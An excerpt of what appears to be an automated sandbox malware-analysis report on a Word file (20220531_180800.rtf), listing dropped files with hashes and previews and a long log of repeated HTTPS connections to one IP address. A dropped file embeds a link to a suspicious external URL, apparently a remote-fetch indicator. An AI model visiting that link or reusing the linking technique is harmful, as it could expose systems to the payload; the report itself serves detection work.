          Preview:..M.O.T.D.............L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.c.y.b.e.r.l.e.a.g.u.e...c.o./.t.h.1.s...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.0256287320096627
          Encrypted:false
          SSDEEP:6:I3DPcfObYvxggLRHF1NNSapRXv//4tfnRujlw//+GtluJ/eRuj:I3DPJbOr7PFHvYg3J/
          MD5:0F8D76FDBEDB717807CA629B7BFECABE
          SHA1:171373F8A5B5A47539DBD5CCE33C58CA2BD66EDD
          SHA-256:C1D337465844316985A4631572BEB8DE266EFBD2CD9A35AA991E24AFAB233FBF
          SHA-512:8473B7DC81543F660D7E1FD57CB9D215E62F8C4BDA3F1744DFA53C4AFDED4C9B1014F8E7AC298B33484103CCB3DB6077424D38018B106C33EB97EAE8E9FA165D
          Malicious:false
          Preview:......M.eFy...zX1.U...E.......S,...X.F...Fa.q.................................`.C...H..A.........%.k....I...-...Z.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.025609728427755104
          Encrypted:false
          SSDEEP:6:I3DPciIeBvxggLR21MtiX/t0tE3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPrBPtivmtERvYg3J/
          MD5:560D6C31C54209C7E805EAC5ADA0DBB4
          SHA1:A4CAB559CB8FC78B59DE7F225BC5406257794615
          SHA-256:3B3232E7A76CD10AC33A42A30D2447BB78FA2AC693B94687A6F644BFB03D98E6
          SHA-512:0372D772A5DAE29AFEF459599119D6568BE5A2B690D9689F71B7FC84317503E3F4B4A3B785641683F754A3D22194020736D7B5AEA86F1819AD2235863AE8B5F8
          Malicious:false
          Preview:......M.eFy...z......F....Qk..S,...X.F...Fa.q..............................zKwG/K.9..`j.............F...H.4.....m.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:51 2022, mtime=Tue Mar 8 15:45:51 2022, atime=Sat Jun 4 04:58:10 2022, length=199522, window=hide
          Category:dropped
          Size (bytes):1039
          Entropy (8bit):4.495584157169374
          Encrypted:false
          SSDEEP:12:8epRgXg/XAlCPCHaXWBlXB/zxkpX+WZjewU0fWiLCicvbOd7MYDtZ3YilMMEpxRG:8En/XTm3xqbiwU0fpLJeqNDv3q/Y7h
          MD5:0D873EAEF2936CDC358A2B9E248B5432
          SHA1:78DAECA24D53D6739485EF2628959D3D7572CF86
          SHA-256:EDD37464C85F0C3932E9CE1741CA5B21BE7B65CD16165E93206F2C681E4119CB
          SHA-512:81D184F7B79B79BF0EDDEE9ECA67476981AA90AC1FFFBBAB5EB0428FD6411124FD6C2B65DCABD3B729E584CF9FDED99BFC64CCFDE1F1E9391548010815F2356C
          Malicious:false
          Preview:L..................F.... ....X...3...X...3.......w..b............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.b....TF/ .202205~1.RTF..T......hT..hT..*...r.....'...............2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.......}...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\20220531_180800.rtf.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9...N..... ...
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):82
          Entropy (8bit):4.526832677737851
          Encrypted:false
          SSDEEP:3:bDuMJlHDISlmxWk1DISlv:bCBSjS1
          MD5:07CF9C274D2D15FCBB60B6FD51508E35
          SHA1:C35DD2A08AA5B765EDB55775B247CCE0C0090064
          SHA-256:07AB1BBAA3C36DDF78D815F20B1C37D36775AED93532D8BC8A3A200B92B6120F
          SHA-512:FEDAF1A0E92C4A3123F8916CB1F6AFFC708806AD9A825C070824CF27A11C52CE692AC579F955CA9503180229ECA49974D29643369C63DD77017732356E42B33F
          Malicious:false
          Preview:[folders]..Templates.LNK=0..20220531_180800.LNK=0..[misc]..20220531_180800.LNK=0..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.503835550707525
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
          MD5:C5E24006AFAC8C2659023AD09A07EB0F
          SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
          SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
          SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.503835550707525
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
          MD5:C5E24006AFAC8C2659023AD09A07EB0F
          SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
          SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
          SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
          File type:Microsoft OOXML
          Entropy (8bit):7.9948510704789975
          TrID:
          • Word Microsoft Office Open XML Format document (49504/1) 49.01%
          • Word Microsoft Office Open XML Format document (43504/1) 43.07%
          • ZIP compressed archive (8000/1) 7.92%
          File name:20220531_180800.rtf
          File size:199522
          MD5:7b9c8e08371550238fbcd7cee1c8087d
          SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
          SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
          SHA512:962c4c0a48519ffa81a95771b25987cc6aeed4bb8737e1e5ab242233f849370d72675f08da3628270bad410659772f437209d7f02bed089b5a220f97314ec1f4
          SSDEEP:3072:LP/BkCPAXydgrYOUIr0XX95JQ7Anr5w2wJLWsk2n3rYxNYlT+MaJis19s9k:b/qXySM3XtQMnrq2Jon3MfYoL19s9k
          TLSH:7814131876E61EB9C60F3BB6B875A1076B9F0017EC14D2BF0C6065F98931964B670F8B
          File Content Preview:PK..........!....iw...........[Content_Types].xml.T.n.0..W.? _#p.CUU!9t96..~.1.q.M...}.HQ........y..f........F.d..I...\.2%.....D>0.3i4.d..L'.7.......}J.!.GJ=_.b>1.4".q..<..Z.?Y..n8.....:... ..3.l-C....M.Lh.=5u.UJ..Rp.........(.....BJb$....@h.>..H_.*....n.
          Icon Hash:e4eea2aaa4b4b4a4
          TimestampSource PortDest PortSource IPDest IP
          Jun 3, 2022 22:57:19.943697929 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:19.943775892 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:19.943865061 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:19.964051008 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:19.964108944 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.359473944 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.359684944 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.373123884 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.373183012 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.373627901 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.373694897 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.676564932 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.720520973 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.866599083 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.866712093 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.866750956 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.866786957 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.866797924 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.866830111 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.866849899 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.866868019 CEST4434917113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:20.866874933 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:20.866910934 CEST49171443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.539957047 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.540018082 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:26.540102005 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.540370941 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.540399075 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:26.960410118 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:26.960488081 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.967047930 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:26.967062950 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:26.967387915 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:26.980971098 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:27.024497986 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:27.376456022 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:27.376615047 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:27.376735926 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:27.376802921 CEST49172443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:27.376820087 CEST4434917213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:31.790095091 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:31.790122986 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:31.790210962 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:31.791918039 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:31.791934967 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.201199055 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.202213049 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.225771904 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.225794077 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.226578951 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.272612095 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.316492081 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.602184057 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.602251053 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.602561951 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.602585077 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.602600098 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.602688074 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.602694988 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:32.602695942 CEST49173443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:32.602699041 CEST4434917313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.228313923 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.228359938 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.228441954 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.228722095 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.228737116 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.606906891 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.607220888 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.621345997 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.621412039 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.622071028 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.623574018 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.668502092 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.976391077 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.976555109 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:35.976737976 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.983047962 CEST49174443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:35.983087063 CEST4434917413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.074811935 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.074841022 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.074956894 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.075555086 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.075567007 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.458427906 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.458610058 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.471674919 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.471684933 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.472399950 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.474443913 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.516489029 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.833076000 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.833199978 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.833389997 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.838345051 CEST49175443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.838361979 CEST4434917513.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.864737034 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.864792109 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:37.864876986 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.866413116 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:37.866449118 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.243213892 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.243807077 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.277620077 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.277631998 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.281229019 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.281239033 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616075039 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616178036 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616194010 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.616221905 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616241932 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.616262913 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.616275072 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616309881 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.616332054 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.616359949 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.618458033 CEST49176443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.618490934 CEST4434917613.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.826630116 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.826662064 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:38.826791048 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.827254057 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:38.827266932 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.221398115 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.221622944 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.222325087 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.222341061 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.229341030 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.229365110 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.612029076 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.612159014 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.612246990 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.612323999 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.612436056 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.612473011 CEST4434917713.250.15.191192.168.2.22
          Jun 3, 2022 22:57:39.612490892 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:39.612548113 CEST49177443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.013264894 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.013319969 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.013473034 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.013536930 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.013552904 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.421729088 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.422668934 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.422812939 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.422827959 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.429675102 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.429687977 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.824681997 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.824826002 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.824934006 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.824954033 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.825187922 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.825215101 CEST4434917813.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.825232029 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.825298071 CEST49178443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.919873953 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.919951916 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:40.920033932 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.920434952 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:40.920463085 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.325354099 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.325489998 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:41.339307070 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:41.339329958 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.340070963 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.341128111 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:41.384496927 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.721765041 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.721859932 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:41.722080946 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:41.722244024 CEST49179443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:41.722273111 CEST4434917913.250.15.191192.168.2.22
          Jun 3, 2022 22:57:42.683770895 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:42.683818102 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:42.683906078 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:42.684485912 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:42.684510946 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.092612982 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.092722893 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:43.099359035 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:43.099375010 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.099873066 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.101250887 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:43.144592047 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.494555950 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.494617939 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:43.494937897 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:43.495177984 CEST49180443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:43.495208979 CEST4434918013.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.354296923 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.354358912 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.354528904 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.355681896 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.355722904 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.732672930 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.732757092 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.739978075 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.739991903 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.740324020 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:44.742100000 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:44.784501076 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.105829954 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.105897903 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.106028080 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.106206894 CEST49181443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.106231928 CEST4434918113.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.125375032 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.125458956 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.125571966 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.125909090 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.125927925 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.518675089 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.518877029 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.519414902 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.519440889 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.523298025 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.523339033 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.909744024 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.909878969 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.910048962 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.911292076 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.911326885 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.911362886 CEST4434918213.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.911381006 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.911441088 CEST49182443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.914758921 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.914820910 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:45.914906025 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.915287018 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:45.915318012 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.295481920 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.295619011 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.296084881 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.296093941 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.299644947 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.299659967 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.673059940 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.673167944 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.673171043 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.673223019 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.682723999 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.682787895 CEST4434918313.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.682807922 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.682851076 CEST49183443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.885020971 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.885052919 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:46.885118961 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.885339022 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:46.885349989 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.259876013 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.259933949 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.260330915 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.260335922 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.263874054 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.263886929 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.632270098 CEST4434918413.250.15.191192.168.2.22
